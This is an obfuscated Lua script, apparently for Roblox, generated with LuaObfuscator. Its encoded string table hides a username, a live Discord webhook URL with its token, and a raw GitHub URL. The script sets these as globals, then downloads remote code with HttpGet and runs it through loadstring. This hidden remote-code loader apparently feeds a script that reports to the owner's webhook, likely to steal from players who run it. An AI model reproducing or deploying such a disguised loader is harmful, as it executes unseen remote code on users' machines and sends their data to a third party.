--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + 1 ;v31=1 -0 ;end if (v31==1) then return v32;end end end v23=nil;function v23()local v33=0 -0 ;local v34;local v35;while true do if (v33==(620 -(555 + 11 + 53))) then return (v35 * 256) + v34 ;end if ((931 -(857 + 74))==v33) then v34,v35=v1(v16,v19,v19 + ((1447 -(282 + 595)) -(367 + 201)) );v19=v19 + (929 -(214 + 713)) ;v33=(1638 -(1523 + 114)) + 0 ;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=1 + 0 ;local v39=(v21(v37,3 -2 ,28 -8 ) * ((1067 -(68 + 997))^(1302 -(226 + 1044)))) + v36 ;local v40=v21(v37,(40 + 51) -70 ,148 -(32 + 85) );local v41=((v21(v37,90 -58 )==(1 + (0 -0))) and  -(1 + 0)) or (1 + 0) ;if (v40==(957 -(892 + 65))) then if (v39==(0 -0)) then return v41 * (0 -0) ;else local v77=0 -0 ;while true do if (v77==(0 -0)) then v40=351 -(87 + 263) ;v38=180 -(67 + 113) ;break;end end end elseif (v40==((1940 -(145 + 293)) + 545)) then return ((v39==((430 -(44 + 386)) -0)) and (v41 * (((1505 -(998 + 488)) -(10 + 8))/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(2511 -1488) ) * (v38 + (v39/(((2 + 4) -4)^(39 + 13)))) ;end v26=nil;function v26(v42)local v43=0 + 0 ;local v44;local v45;while true do if (v43==(772 -(11 + 190 + 202 + 369))) then v44=nil;if  not v42 then v42=v24();if (v42==0) then return "";end end v43=1139 -(116 + 1022) ;end if ((12 -(894 -(261 + 624)))==v43) then return v6(v45);end if (v43==(1 + 0)) then v44=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;v43=7 -5 ;end if (((16 -9) -5)==v43) then v45={};for v78=1, #v44 do v45[v78]=v2(v1(v3(v44,v78,v78)));end v43=862 -((1446 -632) + 45) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (3~=v46) then else v53=nil;while true do local v80=0;while true do if (v80~=0) then else if (v47==(0 + 0)) then local v105=574 -(507 + 67) ;local v106;while true do if (v105==0) then v106=1749 -(1013 + 736) ;while true do if (v106==2) then v47=1;break;end if (1==v106) then v50={};v51={v48,v49,nil,v50};v106=869 -(550 + 317) ;end if (v106~=(0 -0)) then else v48={};v49={};v106=1;end end break;end end end if (v47==(2 -0)) then for v108=1,v24() do local v109=0;local v110;local v111;while true do if (v109==0) then v110=0 -0 ;v111=nil;v109=1;end if (v109~=(286 -(134 + 151))) then else while true do if (0~=v110) then else v111=v22();if (v21(v111,1666 -(970 + 695) ,1)~=0) then else local v134=0;local v135;local v136;local v137;local v138;while true do if ((0 -0)==v134) then local v174=1990 -(582 + 1408) ;while true do if (v174==0) then v135=0;v136=nil;v174=3 -2 ;end if (v174~=(1 -0)) then else v134=3 -2 ;break;end end end if (v134~=2) then else while true do if (v135==0) then local v184=0;while true do if (v184==1) then v135=1;break;end if (v184==(1824 -(1195 + 629))) then v136=v21(v111,2,3);v137=v21(v111,4,6);v184=1;end end end if (v135~=(1 -0)) then else local v185=241 -(187 + 54) ;local v186;while true do if (v185==0) then v186=780 -(162 + 618) ;while true do if (v186==(1 + 0)) then v135=2;break;end if (v186~=(0 + 0)) then else local v197=0 -0 ;while true do if (v197~=(0 -0)) then else v138={v23(),v23(),nil,nil};if (v136==(1636 -(1373 + 263))) then local v198=0;local v199;while true do if (v198~=(1000 -(451 + 549))) then else v199=0 + 0 ;while true do if ((0 -0)==v199) then v138[3]=v23();v138[4]=v23();break;end end break;end end elseif (v136==1) then v138[4 -1 ]=v24();elseif (v136==(1386 -(746 + 638))) then v138[3]=v24() -(2^(7 + 9)) ;elseif (v136~=(4 -1)) then else local v204=341 -(218 + 123) ;local v205;local v206;while true do if ((1582 -(1535 + 46))==v204) then while true do if (v205==0) then v206=0 + 0 ;while true do if (0~=v206) then else v138[1 + 2 ]=v24() -((562 -(306 + 254))^16) ;v138[4]=v23();break;end end break;end end break;end if (v204~=0) then else v205=0;v206=nil;v204=1 + 0 ;end end end v197=1 -0 ;end if (v197==(1468 -(899 + 568))) then v186=1 + 0 ;break;end end end end break;end end end if (v135~=(4 -2)) then else local v187=0;while true do if (v187==0) then if (v21(v137,1,604 -(268 + 335) )~=(291 -(60 + 230))) then else v138[574 -(426 + 146) ]=v53[v138[1 + 1 ]];end if (v21(v137,1458 -(282 + 1174) ,2)~=1) then else v138[814 -(569 + 242) ]=v53[v138[3]];end v187=2 -1 ;end if (v187==1) then v135=3;break;end end end if (v135~=3) then else if (v21(v137,3,3)==(1 + 0)) then v138[1028 -(706 + 318) ]=v53[v138[4]];end v48[v108]=v138;break;end end break;end if (v134==(1252 -(721 + 530))) then local v175=1271 -(945 + 326) ;while true do if (v175==(2 -1)) then v134=2;break;end if (v175~=0) then else v137=nil;v138=nil;v175=1 + 0 ;end end end end end break;end end break;end end end for v112=701 -(271 + 429) ,v24() do v49[v112-(1 + 0) ]=v29();end return v51;end v80=1;end if (v80==(1501 -(1408 + 92))) then if (v47~=1) then else local v107=0;while true do if (v107==2) then v47=2;break;end if (v107~=0) then else v52=v24();v53={};v107=1;end if (v107==1) then for v115=1,v52 do local v116=0;local v117;local v118;local v119;while true do if (v116~=(1087 -(461 + 625))) then else v119=nil;while true do if (v117==(1288 -(993 + 295))) then local v161=0;while true do if (v161==1) then v117=1 + 0 ;break;end if (v161~=0) then else v118=v22();v119=nil;v161=1;end end end if (v117~=1) then else if (v118==1) then v119=v22()~=0 ;elseif (v118==2) then v119=v25();elseif (v118~=(1174 -(418 + 753))) then else v119=v26();end v53[v115]=v119;break;end end break;end if (0==v116) then v117=0 + 0 ;v118=nil;v116=1 + 0 ;end end end v51[1 + 2 ]=v22();v107=2;end end end break;end end end break;end if (v46~=(1 + 0)) then else v49=nil;v50=nil;v46=531 -(406 + 123) ;end if (v46==(1769 -(1749 + 20))) then v47=0 + 0 ;v48=nil;v46=1323 -(1249 + 73) ;end if (v46==2) then v51=nil;v52=nil;v46=2 + 1 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v54,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v54,16));if v20 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v71,v20);v20=nil;v97=1;end end else return v71;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + 3 );v19=v19 + (1149 -(466 + 679)) ;return (v58 * (40357086 -23579870)) + (v57 * (187445 -121909)) + (v56 * (2156 -(34 + 72 + 1794))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (1==v62) then v65=v59[3];return function(...)local v81=v63;local v82=v64;local v83=v65;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end if (v96==1) then if (v94<=10) then if (v94<=4) then if (v94<=1) then if (v94==0) then v91[v93[2]]();else v91[v93[2]]=v61[v93[3]];end elseif (v94<=2) then v61[v93[3]]=v91[v93[2]];elseif (v94>3) then do return;end else v91[v93[2]]=v61[v93[3]];end elseif (v94<=7) then if (v94<=5) then local v124=0;local v125;local v126;while true do if (v124==0) then v125=v93[2];v126=v91[v93[3]];v124=1;end if (v124==1) then v91[v125 + 1 ]=v126;v91[v125]=v126[v93[4]];break;end end elseif (v94==6) then v85=v93[3];else local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==0) then v143=v93[2];v144,v145=v84(v91[v143](v13(v91,v143 + 1 ,v93[3])));v142=1;end if (v142==1) then v86=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==2) then for v182=v143,v86 do local v183=0;while true do if (v183==0) then v146=v146 + 1 ;v91[v182]=v144[v146];break;end end end break;end end end elseif (v94<=8) then v91[v93[2]]=v93[3];elseif (v94==9) then local v147=0;local v148;local v149;while true do if (v147==0) then v148=v93[2];v149=v91[v93[3]];v147=1;end if (v147==1) then v91[v148 + 1 ]=v149;v91[v148]=v149[v93[4]];break;end end else local v150=v93[2];v91[v150]=v91[v150](v13(v91,v150 + 1 ,v86));end elseif (v94<=15) then if (v94<=12) then if (v94>11) then do return;end else v61[v93[3]]=v91[v93[2]];end elseif (v94<=13) then v85=v93[3];elseif (v94>14) then v91[v93[2]]=v93[3]~=0 ;else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=18) then if (v94<=16) then local v132=0;local v133;while true do if (v132==0) then v133=v93[2];v91[v133]=v91[v133](v13(v91,v133 + 1 ,v86));break;end end elseif (v94==17) then local v154=v93[2];local v155,v156=v84(v91[v154](v13(v91,v154 + 1 ,v93[3])));v86=(v156 + v154) -1 ;local v157=0;for v170=v154,v86 do v157=v157 + 1 ;v91[v170]=v155[v157];end elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=19) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94==20) then v91[v93[2]]=v93[3];else v91[v93[2]]();end v85=v85 + 1 ;break;end end end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v72=(v66/((1 + 1)^(v67-(2 -1))))%((5 -3)^(((v68-(115 -(4 + 110))) -(v67-(585 -(57 + (693 -(122 + 44)))))) + (1428 -(41 + 1386)))) ;return v72-(v72%(104 -(17 + 86))) ;else local v73=2^(v67-(1 + 0)) ;return (((v66%(v73 + v73))>=v73) and ((1 -0) -0)) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030C3O0049747A536C2O657079313233030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313631303934373836342O3539362O3932332F585255324C52464F384139656B686C39475F7764373156704176496B73314B6458354E6838527A6C4F4E6858417269576779434C4F6B45512D3742364A63366253364F6900173O0012083O00013O0026123O000E000100020004063O000E0001001208000100043O00120B000100033O001201000100053O001201000200063O002005000200020007001208000400084O000F000500014O0011000200054O001000013O00024O0001000100010004063O001600010026123O0001000100010004063O00010001001208000100043O00120B000100093O0012080001000B3O00120B0001000A3O0012083O00023O0004063O000100012O000C3O00017O00",v9(),...);
